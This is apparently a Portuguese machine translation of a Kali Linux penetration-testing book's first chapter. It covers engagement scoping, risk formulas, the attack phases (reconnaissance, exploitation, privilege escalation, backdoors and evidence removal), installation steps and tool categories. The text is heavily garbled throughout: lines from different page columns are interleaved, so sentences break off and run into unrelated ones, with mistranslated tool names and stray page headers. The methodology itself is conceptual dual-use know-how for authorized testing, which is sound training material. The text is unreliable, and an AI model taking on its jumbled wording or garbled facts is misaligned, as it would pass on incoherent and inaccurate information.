conformidade, em vez da avaliao los) no escolhem alvos aleatrios. tais como tempo, o financiamento, a teste deve iniciar e que
genrico, e pode ser Eles so tica, ou ferramentas significado o prazo previsto para atingir as metas
um engate mais curto, dependendo da motivados e tm geralmente que a limitao de mbito Teste de especificadas. A melhor prtica no
forma como o espao-alvo limitado. interagiram de alguma forma com o Invaso pode no representar um limitar
Caixa branca seu alvo antes de cenrio do mundo real. o escopo de tempo para o horrio
atribuies poderia reduzir coleta de tentar um ataque. Caixa cinza uma Em contraste com um alcance comercial.
informaes esforos, como abordagem opo atraente para limitado, tendo um alcance ilimitado Como as metas so Avaliado: Que
reconhecimento muitos segurana nunca pode avaliar crtica tipos de mtodos de teste, tais como
servios, igualando menos custos profissionais que realizam testes de vulnerabilidades se um teste de digitalizao ou explorao no so
para os servios de testes de penetrao porque imita abordagens penetrao concludo antes de permitidas e? Qual o risco associado
penetrao. do mundo real atacar os sistemas desejados. com os mtodos de teste especficos
Um grupo de segurana interna utilizado por atacantes e se concentra Por exemplo, um verificador da permitidos? Qual o impacto das
geralmente executa teste de caixa em vulnerabilidades em vez de penetrao pode capturar as metas que
branca. reconhecimento. credenciais do usurio para sistemas tornar-se inoperante devido a
Teste de caixa cinza cai entre preto e O escopo do trabalho define a forma crticos tentativas de penetrao? Exemplos
teste de caixa branca. quando a como os servios de penetrao ser e concluir com acesso a esses so; usando sociais
cliente ou sistema proprietrio iniciado e executado. sistemas sem testar o quo vulnervel rede, fingindo ser um funcionrio,
concorda que algumas informaes Ao inaugurar um compromisso de os ataque de negao de servio em
desconhecido acabar servio Teste de Invaso deve incluir sistemas so a ataques baseados em chave
ser descoberto durante uma fase de uma informao rede. Tambm importante incluir que sistemas, ou a execuo de scripts em
reconhecimento, mas permite que o coleta de sesso usado para est ciente de servidores vulnerveis. Alguns
verificador da penetrao documentar o ambiente de destino e o teste de penetrao como uma parte mtodos de ataque
para pular esta parte. O verificador da definir os limites do escopo. Atacantes reais podem pode representar um risco maior de
penetrao fornecido alguns da atribuio de evitar servios atacar a qualquer momento e sistemas prejudiciais do que outros.
detalhes bsicos do alvo; desnecessrios ou sistemas de provavelmente quando as pessoas [11]
no entanto, funcionamento interno e reconhecimento de ataque esto menos esperava.
algumas outras informaes que esto fora do escopo. Um escopo Alguns fundamentos para o
privilegiadas ainda mantido bem definido de trabalho vai desenvolvimento de um espao de
do verificador da penetrao. economizar um prestador de servios trabalho para um teste de penetrao Teste de Invaso e Configurao
[10] de so
aumento do escopo (definido como como se segue: Ferramentas e software: Quais as
Captulo 1 mudanas no controladas ou ferramentas e software so usados
Atacantes reais tendem a ter algumas crescimento contnuo em um projeto Definio do sistema de destino (s): durante a penetrao
informaes sobre um alvo antes de de Isto especifica quais sistemas devem Teste? Isto importante e um pouco
se envolver escopo), operar dentro dos prazos ser testados. controverso. Muitos profissionais de
o alvo. A maioria dos agressores (com previstos e ajudar a fornecer mais Isto inclui a localizao na rede, tipos segurana
exceo de script kiddies ou precisa de sistemas e uso comercial
indivduos a entregar ao encerrar servios. desses sistemas.
Acredito que se eles divulgam suas nuvem provedor de servios que Teste deve comprometer um sistema com possveis itens de ao de
ferramentas de que estar dando seu podem ser afetados a partir de seus ou um processo. Caso os dados remediao? Quem deve ser
molho secreto. servios. sejam removidos notificado se um sistema
Acreditamos que este apenas o Acesso Inicial Nvel: Que tipo de a partir da rede ou que o intruso inutilizada durante um exerccio de
caso quando os profissionais de informao eo acesso fornecido apenas obter um determinado nvel de Teste de Invaso? O que acontece
segurana amplamente utilizado antes de chutar fora o Teste de acesso no autorizado? se os dados confidenciais so
produtos comerciais disponveis e so Invaso? O verificador da penetrao Produto final: Que tipo de relatrio detectados? A maioria dos servios de
simplesmente rebranding relatrios tm final esperado? Que metas faz o testes de penetrao no
enlatados de acesso ao servidor via Internet e / ou cliente especificar a ser realizado aps incluir remediao de problemas
estes produtos. Profissionais de Intranet? Que tipo de conta inicial o fechamento de um servio Teste de encontrados.
segurana experientes iro nvel de acesso concedido? este Invaso Algumas definies de servio que
disponibilizar as ferramentas que so um preto, branco, cinza ou atribuio acordo? Certifique-se que as metas devem ser usados para definir o
utilizado, e, em alguns casos, quando caixa para no so uma durao limitada para escopo de servios so:
as vulnerabilidades so exploradas, cada alvo? evitar aumento do escopo
documentao Definio de Espao Pblico-alvo: servio do esperado. qualquer um Auditoria de Segurana: Avaliando um
os comandos usados dentro das Este define as funes especficas de dos dados classificados ou nvel de risco de uma aplicao do
ferramentas para explorar uma negcios designados para um determinado sistema ou contra um
vulnerabilidade. Isso faz com que o includo no teste de penetrao. Por grupo de pessoas? Como deve ser o conjunto de normas ou linhas de base.
explorar recriados, e permite que o exemplo, a realizao de um teste de relatrio final ser entregue? As normas so regras obrigatrias,
cliente realmente entender como o penetrao importante enquanto as linhas de base
sistema em uma aplicao web especfico para entregar um relatrio de exemplo so o nvel mnimo aceitvel de
foi comprometida ea dificuldade utilizado por vendas, enquanto no ou atualizaes peridicas para que segurana. Normas e linhas de base
associada com a explorar. tocar em um diferente no haja surpresas atingir
Partes notificadas: Quem est ciente aplicativo hospedado no mesmo no relatrio final. consistncia nas implementaes de
do Teste de Invaso? Eles esto servidor. [12] segurana e pode ser especfico para
informados Identificao de reas de operao as indstrias,
antemo e capaz de preparar? crtica: Definir sistemas que no tecnologias e processos.
reao aos esforos de penetrao deveria A maioria dos pedidos de segurana
parte ser tocado para evitar um impacto serve para auditorias esto focados
o mbito a ser testado? Se assim for, negativo nos servios de testes de em passar uma
pode fazer sentido para no informar a penetrao. auditoria oficial (por exemplo, se
segurana limites do servidor de autenticao preparando para uma empresa ou um
equipe de operaes antes do teste ativo fora? importante fazer crtica Captulo 1 governo
de penetrao. Isto muito importante ativos clara antes de contratar um auditoria), ou provar os requisitos
quando alvo. Expectativas de remediao: Voc bsicos so atendidas por um
olhando para aplicaes web que Definio da Bandeira: importante vulnerabilidades dever ser conjunto obrigatrio de
podem ser hospedados por outra definir o quanto um Penetrao documentado regulamentaes (por exemplo a
parte, como um seguir os mandatos HIPAA e HITECH
para
proteger registros de sade). ameaas. Servios devem incluir o entrega oferece risco potencial vulnerabilidades d uma verdadeira
importante informar os potenciais acompanhamento com os clientes associado com todas as definio e senso de quo vulnervel
clientes para ajudar com vulnerabilidades um sistema
se os seus servios de auditoria remediao, juntamente com a elevar encontrado com possveis medidas de . Em muitos casos, isso significa que
incluem qualquer nvel de seguro ou a fasquia para a segurana para alm remediao. Existem muitas solues, os relatrios de vulnerabilidade
proteo se uma auditoria de qualquer indstria tais como atravs de ferramentas automticas
no for bem sucedida depois de seus normas e linhas de base. Kali Linux que pode ser usado para ter de ser marcada.
servios. Tambm fundamental para Avaliao de Vulnerabilidade: Este o fazer a varredura em busca de Os clientes vo querer saber o risco
documentar o tipo processo em que os dispositivos de vulnerabilidades com base no sistema associado vulnerabilidade e
de remediao includo com servios rede, / custo esperado para reduzir os riscos
de auditoria (isto , se voc faria sistemas operacionais e software de tipo de servidor, sistema operacional, encontrados. Para fornecer o valor de
identificar um problema, oferecer um aplicao so verificados, a fim de portas abertas para a comunicao e custo,
plano de ao de remediao ou identificar outros importante entender como calcular o
corrigir o problema). a presena de vulnerabilidades significa. Avaliaes de risco.
Auditoria de conformidade muito conhecidas e desconhecidas. A Vulnerabilidade pode ser branco, Calculando risco
mais do que correr uma ferramenta de vulnerabilidade uma lacuna, cinza, ou de caixa preta importante entender como calcular o
segurana. Ele se baseia erro, ou fraqueza na forma como um dependendo da natureza da tarefa. risco associado com vulnerabilidades
pesadamente sobre os tipos padro sistema projetado, usado e Scans de vulnerabilidade s so teis encontrado, de modo que uma
de relatrios e seguindo uma protegido. Quando se calcular o risco. A desvantagem de deciso pode ser feito sobre a forma
metodologia que uma vulnerabilidade explorada, pode muitas auditorias de segurana os de reagir. A maioria dos clientes olhar
um padro aceito para a auditoria. resultar em dar acesso no resultados da verificao de ao tringulo CISSP da CIA ao
Em muitos casos, as auditorias de autorizado, vulnerabilidade que fazem auditorias determinar o impacto do risco. CIA o
segurana aos clientes uma falsa escalada de privilgios, ao ativo, ou de segurana confidencialidade, integridade e
sensao de segurana outros resultados de negao de mais espessa, sem fornecer qualquer disponibilidade de um determinado
dependendo do que normas ou linhas servio. valor real. Muitos scanners de sistema ou aplicativo.
de base esto sendo auditados. A [13] vulnerabilidade Ao determinar o impacto do risco, os
maioria das normas ter falsos positivos ou identificar clientes devem olhar para cada
e linhas de base tm um processo de Teste de Invaso e Configurao vulnerabilidades que no esto componente
atualizao muito tempo que no Avaliaes de Vulnerabilidade realmente l. Eles individualmente, bem como a
capaz de manter-se com tipicamente parar uma vez que uma fazer isso porque eles incorretamente vulnerabilidade em sua totalidade para
as rpidas mudanas nas ameaas vulnerabilidade encontrada, identificar o sistema operacional ou obter uma perspectiva verdadeira
encontradas no mundo ciberntico de o que significa que o verificador da est procurando especfico do risco e determinar a probabilidade
hoje. ALTAMENTE penetrao no executar um ataque patches para corrigir as de impacto.
recomendado para oferecer servios contra vulnerabilidades, mas no olhando Cabe ao cliente decidir se o risco
de segurana para alm das normas e a vulnerabilidade para verificar se ele para os patches cumulativos (patches associado vulnerabilidade
linhas de base para genuno. A Avaliao de que encontrada justifica
elevar o nvel de segurana para um Vulnerabilidade conter vrias manchas menores) ou ou supera o custo de controles
nvel aceitvel de proteo para real revises de software. Atribuindo risco necessrios para reduzir o risco a um
para nvel aceitvel.
Um cliente pode no ser capaz de O prximo frmula importante para descobrir o investimento para os verificar se todas as vias de
gastar um milho de dlares em identificar a freqncia com que o LES controles. Isto pode determinar se, e segurana foram cobertas. Teste de
remediar uma ameaa que pode ocorrer. Se um quanto a Invaso pode ser preto,
compromete impressoras de SLE vale um milho de dlares cliente deve investir em remediar a Branco ou caixa cinza, dependendo
hspedes, no entanto, eles sero poderia acontecer uma vez em um vulnerabilidade encontrada em um do escopo de trabalho acordado.
muito disposto a gastar duas vezes milho de anos, como um meteoro ativo. A principal diferena entre a Avaliao
mais caindo do cu, pode no valer a pena Frmula de risco: de teste de penetrao e
tanto em sistemas com dados investir milhes em uma redoma de Risco = Valor Patrimonial * Ameaa * vulnerabilidade
confidenciais da empresa protegendo. proteo Vulnerabilidade * Impacto que um teste de penetrao vai agir
[14] em torno de seu quartel-general. Em comum que os clientes no tm sobre vulnerabilidades encontradas e
contrapartida, se um incndio pode valores para as variveis em Gesto verificar se eles esto
Captulo 1 causar um milho de dlares de Riscos reduzindo reais da lista de risco
O Certified Information Systems de dano e esperado a cada dois frmulas. Estas frmulas servem como associado confirmada com um alvo. A
Security Professional (CISSP) Listas anos, seria aconselhvel investir em sistemas de orientao, para ajudar o Vulnerabilidade
de currculo um incndio cliente a melhor Avaliao de um alvo pode mudar
frmulas para calcular o risco da sistema de preveno. O nmero de entender como eles devem investir em para um teste de penetrao uma vez
seguinte forma. vezes que um ativo perdido segurana. Nas minhas exemplos que o proprietrio do ativo
AExpectativa de perda nica (LES) o chamado de Taxa Anual de anteriores, utilizando a autorizou o prestador de servios para
custo de uma simples perda de um Ocorrncia (ARO). frmulas com valores estimados para executar ataques contra as
Valor Patrimonial (AV). O Expectativa de perda anual (ALE) uma chuva de meteoros e fogo em um vulnerabilidades
Fator de Exposio (EF) o impacto uma expresso da perda antecipada edifcio, deve identificado num alvo. Normalmente,
da perda do activo vai ter a uma anual ajudar a explicar com valor em dlar os servios de testes de penetrao
organizao devido ao risco. Por exemplo, uma estimada por um sistema de tm um custo mais elevado
como a perda de receita devido a um queda de meteoros tem uma baixa preveno de incndios uma melhor associado desde os servios exigem
servidor voltado para a Internet a ser expectativa de anualizada investimento de cpula de metal recursos mais caros, ferramentas e
encerrado. Clientes (Uma vez em um milho de anos), protegendo a queda de objetos. tempo para
deve calcular a SLE de um ativo ao enquanto que um incndio muito [15] completar tarefas com sucesso. Um
avaliar os investimentos de segurana mais provvel e deve ser calculada equvoco popular que a penetrao
para ajudar em Teste de Invaso e Configurao Servio de teste aumenta a segurana
identificar o nvel de financiamento futuros investimentos para a proteo Teste de Invaso o mtodo de de TI pois os servios tm um custo
que deve ser atribudo para controles. de um edifcio. atacar as vulnerabilidades do sistema mais elevado associado
Se um SLE faria Anualizado frmula expectativa de de forma semelhante de outros servios de segurana:
causar um milho de dlares em perda: para ataques maliciosos reais.
danos para a empresa, no faria ALE = SLE * ARO Normalmente, os servios de testes O Teste de Invaso no tornar as
sentido considerar A pergunta final e importante a ser de penetrao so solicitados quando redes de TI mais seguro, j que os
que no oramento. respondida o risco associado a um um sistema ou rede esgotou os servios
A nica frmula expectativa de perda: ativo usado investimentos em segurana e os avaliar a segurana existente! Um
SLE = AV * EF clientes esto buscando cliente no deve considerar um
Penetrao
Testar se h uma crena a meta no sistema pode ser restaurado por um rentabilidade de tempo e servios Teste de caixa preta requer mais
completamente seguro. cliente usando backups ou algum utilizados para entregar o reconhecimento do que o teste de
Teste de Invaso pode causar um outro desastre engajamento Teste de Invaso. caixa branca, pois os dados so
impacto negativo aos sistemas: mtodo de recuperao. Um processo mais eficiente e preciso no fornecidas sobre o alvo (s).
fundamental para significa melhores resultados para Servios de reconhecimento pode
ter autorizao por escrito das Teste de Penetrao expectativas menos servios utilizados. incluir pesquisa
autoridades competentes, antes de entregveis devem ser bem definidos Quanto maior for a qualidade dos pegada de Internet de um alvo, os
iniciar embora concordando resultados, quanto mais prximo o recursos de monitoramento, pessoas
Um teste de penetrao de um ativo em um escopo de trabalho. Os servio pode atender ao cliente e processos, digitalizao
pertence a outro partido. No ter mtodos mais comuns pelo qual expectativa, resultando em uma para obter informaes de rede, como
adequado hackers obtm informaes melhor reputao e mais negcios no endereos IP e tipos de sistemas,
autorizao pode ser visto como sobre as metas atravs de futuro. Para estes engenharia social
pirataria ilegal pelas autoridades. engenharia social atravs de atacar as razes, importante desenvolver uma servios pblicos, como help desk e
Autorizao pessoas, em vez de sistemas. metodologia para a execuo de outros meios.
deve incluir quem responsvel por Exemplos est entrevistando para testes de penetrao Reconhecimento o primeiro passo
quaisquer danos causados durante a uma posio dentro da organizao e servios, bem como sobre como de um compromisso de servio Teste
penetrao saindo um denunciar o que for encontrado. de Invaso
exerccio, bem como quem deve ser semana depois com dados sensveis Conceitos Kali Testes de Penetrao independentemente se voc est
contactado a fim de evitar futuros oferecidos sem resistncia. Este tipo Kali Linux destina-se a seguir os verificando a informao conhecida ou
impactos negativos de entrega maio fluxos de um servio de teste de buscando nova inteligncia
uma vez que um sistema danificado. no ser aceitvel se um cliente est penetrao em um alvo. Reconnaissance comea
A melhor prtica alertar os clientes interessado em saber o quo noivado. Independentemente se o por definir o ambiente de destino com
de toda a vulnervel a web ponto de partida branco, preto, ou base em
riscos potenciais associados com aplicaes so para o ataque remoto. teste de caixa cinza, o escopo do trabalho. Uma vez que o
cada mtodo usado para comprometer tambm importante ter um objectivo h um conjunto de passos que devem alvo identificado, a pesquisa
um alvo final definido assim ser seguidas ao Teste de Invaso um realizada para reunir
antes de executar o ataque para que todas as partes compreendam alvo inteligncia no alvo, como o que
definir as expectativas de nvel. Este quando os servios de penetrao so com Kali ou outras ferramentas. portas so usadas para a
tambm um dos considerados concluiu. Passo 1 - Reconhecimento comunicao, onde
razes que recomendamos Teste de Normalmente, uma entrega acordados Voc deve aprender o mximo ele est hospedado, o tipo de servios
Invaso alvejado com um pequeno serve esse propsito. possvel sobre o ambiente de um alvo oferecidos aos clientes, e assim por
alcance. [16] eo sistema diante. Esta vontade de dados
mais fcil de ser muito mais traos antes de lanar um ataque. desenvolver um plano de ao em
metdico na sua abordagem. Como Captulo 1 Quanto mais informaes voc pode relao aos mtodos mais fceis de
comum O sucesso de um engajamento teste identificar cerca de obter os resultados desejados.
melhores prticas, recebemos a de penetrao para um prestador de um alvo, a melhor chance que voc A entrega de um trabalho de
confirmao, que um cenrio de pior servios baseado em tem que identificar o caminho mais reconhecimento deve incluir uma lista
caso, que uma fcil e mais rpido para o sucesso. de todos os bens
sendo alvo, quais aplicativos esto Tester deve saber o suficiente sobre Avaliando metas para vulnerabilidades dos proprietrios de ativos do alvo.
associados com os ativos, servios um alvo para selecionar como analisar pode ser manual ou automtico O sucesso desta etapa fortemente
utilizados, e a possvel atravs de dependente de esforos anteriores. A
possveis proprietrios de ativos. vulnerabilidades ou fraqueza. ferramentas. H uma srie de maioria dos exploits
Kali Linux oferece uma categoria Exemplos para testes para a fraqueza ferramentas oferecidas em Kali Linux so desenvolvidos para
denominada Coleta de Informaes na forma como a web agrupados como uma categoria vulnerabilidades especficas e pode
que serve como aplicao opera, os servios rotulada causar consequncias indesejveis
um recurso de reconhecimento. As identificados, portas de comunicao, Anlise de Vulnerabilidade. se executado de forma incorreta. A
ferramentas incluem mtodos para a ou outros meios. Ferramentas variam de avaliar os melhor prtica identificar um
pesquisa de rede, dados Avaliaes de vulnerabilidade e dispositivos de rede de bancos de punhado de vulnerabilidades e
sistemas de centro, sem fio e de auditorias de segurana tipicamente dados. desenvolvimento de uma estratgia de
acolhimento. concluir aps este O seguinte a lista de objetivos de ataque baseado na liderana com o
[17] fase do processo de avaliao alvo. avaliao Alvo: primeiro mais vulnerveis.
Capturando informaes detalhadas Explorando alvos pode ser manual ou
Teste de Invaso e Configurao atravs Reconnaissance melhora a automatizado de acordo com o
O seguinte a lista de objetivos de preciso objectivo final.
reconhecimento: de direcionamento de possveis Alguns exemplos esto executando o
vulnerabilidades, reduz o tempo de Alvos de avaliao para fraqueza SQL Injees para ganhar acesso de
execuo para executar alvo Identificar e priorizar os sistemas administrador para uma aplicao web
servios de avaliao, e ajuda a evitar vulnerveis ou engenharia social uma pessoa
de segurana existente. Por exemplo, Mapa sistemas vulnerveis aos Helpdesk em fornecer credenciais de
executando proprietrios de ativos login de administrador.
um scanner de vulnerabilidade Descobertas de documentos Kali Linux oferece um catlogo
genrico contra um servidor de [18] dedicado de ferramentas intitulado
Identificar alvo (s) aplicativos web seria provavelmente Ferramentas de Explorao para a
Definir aplicativos e uso comercial alertar o proprietrio do ativo, tome um Captulo 1 explorao de
Identificar tipos de sistemas tempo para executar e gerar apenas Passo 3 - Explorao metas que vo desde a explorao de
Identificar portas disponveis detalhes genricos Esta etapa explora vulnerabilidades servios especficos para pacotes de
Identificar servios em execuo sobre o sistema e aplicaes. encontradas para verificar se as engenharia social.
Informaes engenheiro passivamente Digitalizar um servidor para uma vulnerabilidades so reais e que O seguinte a lista de objetivos de
sociais vulnerabilidade especfica possvel de informaes ou acesso explorao:
Descobertas de documentos com base em dados obtidos a partir pode ser obtido. Explorao separa
Etapa 2 - Avaliao Alvo Reconnaissance seria mais difcil para Penetrao
Uma vez que um alvo identificado e o proprietrio do ativo Testando servios de servios
pesquisado a partir de esforos de de detectar, proporcionar uma boa passivos tais como avaliaes de
reconhecimento, a prxima vulnerabilidade possvel explorar e vulnerabilidade e auditorias.
passo avaliar o alvo para tomar segundos A explorao e todas as etapas a
vulnerabilidades. Neste ponto, a para executar. seguir tm ramificaes legais sem Explorar vulnerabilidades
penetrao autorizao Obter apoio para o p
Captura de dados no autorizada o Ataques senha e Ferramentas de mtodos poderiam ser backdoors, Injetar dados falsos, se necessrio
Engenheiro agressivamente sociais Explorao catlogo. Como a maioria novas contas de administrao, tneis Esconder mtodos de comunicao
Atacar outros sistemas ou aplicaes dessas ferramentas criptografados, por meio de criptografia e outros
Descobertas de documentos incluem mtodos para obter acesso e novos canais de acesso rede. meios
Passo 4 - Privilege Escalation inicial e Privilege Escalation, eles O outro aspecto importante da Descobertas de documentos
Ter acesso a um alvo no garante a esto reunidos manuteno de uma posio em um [20]
realizao do objetivo de uma e agrupados de acordo com os seus alvo est removendo
penetrao conjuntos de ferramentas. evidncia da penetrao. Isso far Captulo 1
atribuio. Em muitos casos, um A seguir est uma lista de objetivos com que seja mais difcil de detectar o Apresentando Kali Linux
sistema de explorao de vulnervel escalonamento de privilgios: ataque, assim, Os criadores do BackTrack lanaram
s pode dar limitado reduzindo a reaco por barreiras de um novo Teste de Invaso, avanado
acesso aos dados e recursos de um segurana. Removendo evidncia Distribuio Linux chamada Kali Linux.
alvo. O atacante deve escalar inclui apagamento BackTrack 5 foi a ltima verso
privilgios concedidos usurio fizer, mascarando os canais principal do
para obter o acesso necessrio para Obter acesso Escalado nvel de de acesso existentes e remover os a distribuio BackTrack. Os criadores
capturar a bandeira, o que poderia ser sistema (s) e rede (s) vestgios de adulterao do BackTrack decidiu que para
dados sensveis, crticos Descubra outras informaes de conta como mensagens de erro causadas avanar
infra-estrutura, e assim por diante. de usurio por esforos de penetrao. com os desafios da segurana
Privilege Escalation pode incluir a Acessar outros sistemas com Kali Linux inclui um catlogo intitulado ciberntica e testes moderno uma
identificao e rachaduras senhas, privilgios escalados Mantendo o acesso focado em manter nova fundao foi
contas de usurio, Descobertas de documentos uma necessrio. Kali Linux nasceu e foi
e espao de TI no autorizado. Um Passo 5 - a manuteno de um ponto ponto de apoio dentro de um alvo. As lanado em 13 de maro de 2013. Kali
exemplo alcanar o acesso de de apoio ferramentas so usadas para Linux baseado
usurio limitado, identificando O passo final manter o acesso ao estabelecer diversas formas de em Debian e um sistema de arquivos
um arquivo shadow contendo as estabelecer outros pontos de entrada backdoors FHS-compliant.
credenciais de login de administrao, para o destino em um alvo. Kali tem muitas vantagens sobre
a obteno de um administrador e, se possvel, cobrindo evidncia da A seguir est uma lista de metas para BackTrack. Ele vem com muitas
senha atravs de quebra de senha e penetrao. possvel que a a manuteno de um ponto de apoio: ferramentas mais atualizadas.
acessar sistemas aplicativos internos penetrao As ferramentas so simplificados com
com direitos de acesso de esforos ir acionar as defesas que os repositrios do Debian e
administrador. acabar por garantir como o sincronizados quatro vezes
[19] verificador da penetrao um dia. Isso significa que os usurios
obtido o acesso rede. A melhor tenham as ltimas atualizaes de
Teste de Invaso e Configurao prtica estabelecer outros meios de pacotes e correes de segurana. O
Kali Linux inclui uma srie de acesso Estabelecer vrios mtodos de acesso novo
ferramentas que podem ajudar a o alvo como um seguro contra o rede alvo sistemas de arquivos compatveis
ganhar Privilege Escalation atravs principal caminho a ser fechado. Remover prova de acesso autorizado traduzir-se em execuo a maioria das
Acesso alternativo Sistemas de reparo que impactam ferramentas de qualquer lugar no
pela explorao sistema.
Kali tambm fez personalizao, planeja us-lo em um ambiente virtual. requisitos de hardware so mostrados Voc pode escolher o tipo de
instalao automtica, e rea de Correndo Kali Linux a partir de uma na lista a seguir, embora sugerimos instalao (baseado em GUI ou
trabalho flexvel mdia externa excedendo o valor mnimo por pelo baseado em texto)
ambientes caractersticas fortes em Kali Linux pode ser executado sem menos trs vezes. Kali Linux, em voc gostaria de realizar.
Kali Linux. instalao de software em um disco geral, [22]
Kali Linux est disponvel para rgido de acolhimento, acessando ter um desempenho melhor se ele
download em http://www.kali.org/. lo de uma fonte de mdia externa, tem acesso a mais memria RAM e Captulo 1
Configurao do sistema Kali como uma unidade de DVD ou USB. instalado em mquinas mais novas. 2. Selecione o idioma de preferncia
Kali Linux pode ser baixado em Este mtodo simples Baixe Kali Linux e quer queimar o ISO local, pas e
algumas maneiras diferentes. Um dos para permitir, no entanto, tem o para DVD, ou preparar um pendrive preferncias do teclado.
mais populares desempenho e implementaes com 3. Escolha um nome de host para o
maneiras de obter Kali Linux baixar operacionais. Kali Linux Kali Linux Viva como o meio de host Kali Linux. O padro
a imagem ISO. A imagem ISO est ter que carregar programas a partir de instalao. Se voc no tiver uma hostname Kali.
disponvel uma fonte remota iria afetar o unidade de DVD ou um [23]
em imagens de 32 bits e de 64 bits. desempenho e alguns Porta USB do seu computador, confira
Se voc planeja usar o Kali Linux em aplicativos ou configuraes de o Linux Network Kali Instalar. Teste de Invaso e Configurao
uma mquina virtual como o VMware, hardware podem no funcionar A seguir est uma lista de requisitos 4. Escolha uma senha. Senhas
no corretamente. Usando somente leitura mnimos de instalao: simples pode no funcionar to
uma imagem pr-construdos VM. A de armazenamento Escolheu algo que tem um certo grau
vantagem de baixar a imagem da VM mdia no permite salvar as de complexidade.
que configuraes personalizadas que 5. O prximo prompt pede para o seu
ele vem pr-carregado com podem ser necessrios para fazer Kali fuso horrio. Modificar de acordo
ferramentas VMware. A imagem de Linux Um mnimo de 8 GB de espao em e selecione Continuar. A prxima
VM uma imagem de 32 bits com operar corretamente. altamente disco para a instalao de Kali Linux. imagem mostra a seleo
Physical Address Extension apoio, ou recomendado para instalar Kali Linux Para arquiteturas i386 e amd64, um Oriental tempo padro.
mais conhecido como PAE. Em teoria, em um disco rgido host. mnimo de 512MB de RAM. [24]
um PAE [21] Suporte de inicializao de CD-DVD
do kernel permite que o sistema para Drive / USB. Captulo 1
acessar mais memria do que um Teste de Invaso e Configurao Voc tambm vai precisar de uma O instalador ir pedir para configurar
sistema tradicional de 32 bits Instalando Kali Linux conexo ativa com a Internet antes da suas parties. Se voc estiver
sistema operativo. Houve algumas Instalando Kali Linux em seu instalao. Este instalando em uma Kali virtuais
personalidades bem conhecidas no computador simples e semelhante muito importante ou voc no ser imagem, selecione Guiado Instale -
mundo da instalao capaz de configurar e acessar disco inteiro. Isto ir destruir todos os
sistemas operacionais que tm outros sistemas operacionais. Em repositrios dados do disco
argumentado a favor e contra a primeiro lugar, voc vai precisar de durante a instalao. Kali e instalar Linux. Tenha em mente
utilidade de um kernel PAE. hardware compatvel. Barrilha 1. Quando voc comear a Kali, voc que em uma mquina virtual, s o
No entanto, os autores deste livro compatvel com i386, amd64 e ser presenteado com uma tela de disco virtual
sugiro usar a imagem da VM de Kali plataformas ARM (ambos Armel e inicializao de instalao. est sendo destrudo. Os usurios
Linux se armhf). O avanados podem selecionar
configuraes manuais para Captulo 1 Se voc baixou uma imagem de VM directamente a partir desta categoria.
personalizar 8. Kali ir pedir para instalar o GRUB. de Kali, voc vai precisar da senha de No entanto aplicaes web nem
parties. Kali tambm oferece a GRUB um multi-bootloader que root. O padro sempre se referem
opo de utilizar LVM, gerente de d ao usurio a capacidade de nome de usurio raiz e senha toor. de ataques contra servidores web,
volume lgico. LVM escolher e arrancar a operao Viso geral ferramentas Kali eles podem simplesmente ser
permite-lhe gerir e redimensionar mltipla Kali Linux oferece uma srie de ferramentas baseadas na Web para
parties aps a instalao. Em teoria, sistemas. Em quase todos os casos, ferramentas personalizadas servios de rede. Por exemplo, a web
supe-se voc deve selecionar para instalar o concebidas para testes de penetrao. proxies ser encontrado em
para permitir a flexibilidade, quando as GRUB. Se voc Ferramentas so classificadas nos nesta seo.
necessidades de armazenamento de est configurando o seu sistema de seguintes grupos como visto no menu Senha Ataques: Esta seo de
mudar de instalao inicial. No dual boot, voc vai querer ter drop-down ferramentas lida principalmente com a
entanto, certeza GRUB reconhece os outros mostrado na tela a seguir: fora bruta ou
a menos que as suas necessidades sistemas operacionais a fim de que a [29] a computao desligada de senhas ou
de Kali Linux so extremamente dar aos usurios as opes para cdigos compartilhados usados para
complexas, muito provavelmente voc inicializar em um sistema operacional Teste de Invaso e Configurao autenticao.
no vai precisar alternativo. Ataques sem fio: Estas so
us-lo. Se ele no detectar quaisquer outros Coleta de Informaes: Estas so ferramentas utilizadas para explorar
[25] sistemas operacionais, a mquina ferramentas de reconhecimento as vulnerabilidades encontradas em
iniciar automaticamente em Kali Linux. utilizados para coletar dados protocolos sem fio. 802.11
Teste de Invaso e Configurao [27] em sua rede alvo e dispositivos. ferramentas sero encontrados aqui,
6. A ltima janela apresenta uma Ferramentas variam de identificar os incluindo ferramentas como
reviso das definies de instalao. Teste de Invaso e Configurao dispositivos a aircrack, airmon e ferramentas de
Se 9. Parabns! Voc terminou de protocolos utilizados. quebra de senhas wireless. Alm
tudo parece correto, selecione Sim instalar Kali Linux. Voc ir Anlise de Vulnerabilidade: disso, esta
para continuar o processo, como deseja remover todos os meios Ferramentas deste seco concentrar seo tem ferramentas relacionadas a
mostrado (fsicos ou virtuais) e selecione em sistemas de avaliao vulnerabilidades de RFID e Bluetooth
na imagem seguinte: Continuar de vulnerabilidades. Normalmente, tambm. Em
7. Kali Linux usa repositrios centrais para reiniciar o sistema. estes so executados em sistemas muitos casos, as ferramentas desta
de distribuio de aplicativos [28] encontrados usando o seo ter de ser usado com uma
pacotes. Se voc gostaria de instalar Coleta de informaes ferramentas de rede sem fio
esses pacotes, voc precisa usar Captulo 1 reconhecimento. adaptador que pode ser configurado
um espelho de rede. Os pacotes so Kali Linux e VM imagem primeira Aplicaes Web: Estas so pelo Kali para ser colocado em modo
baixados atravs do protocolo HTTP. corrida ferramentas utilizadas para auditar e promscuo.
Se sua rede usa um servidor proxy, Em alguns mtodos de instalao Kali, explorar vulnerabilidades Ferramentas de Explorao: Estas
voc tambm vai precisar configurar voc ser solicitado a definir a senha em servidores web. Muitas das so ferramentas utilizadas para
as configuraes de proxy para voc do root. ferramentas de auditoria, vamos explorar vulnerabilidades encontradas
rede. Quando Kali Linux inicializa, digite o referimos neste livro vm em sistemas. Normalmente, a
[26] nome de usurio do root ea senha que vulnerabilidade identificada durante
voc selecionou. uma vulnerabilidade
Avaliao de um alvo. Servios do Sistema: Isto onde voc e simplificar o desenvolvimento de um
Cheirando e falsificao: Estas so as pode ativar e desativar servios de mbito aceitvel de trabalho.
ferramentas utilizadas para a captura Kali. Este captulo continuou com o
de pacotes de rede, Os servios so agrupados em carne fornecimento de uma viso geral de
manipuladores de pacotes de rede, bovina, Dradis, HTTP, Metasploit, Kali Linux. Os tpicos includos
aplicaes de artesanato pacotes e [30] MySQL, e SSH. como baixar a verso desejada de Kali
web Existem outras ferramentas includas Linux, maneiras de executar a
spoofing. H tambm algumas Captulo 1 no Kali Linux construir tais como web instalao,
aplicaes de reconstruo VoIP. navegadores, links rpidos para e uma breve viso geral de conjuntos
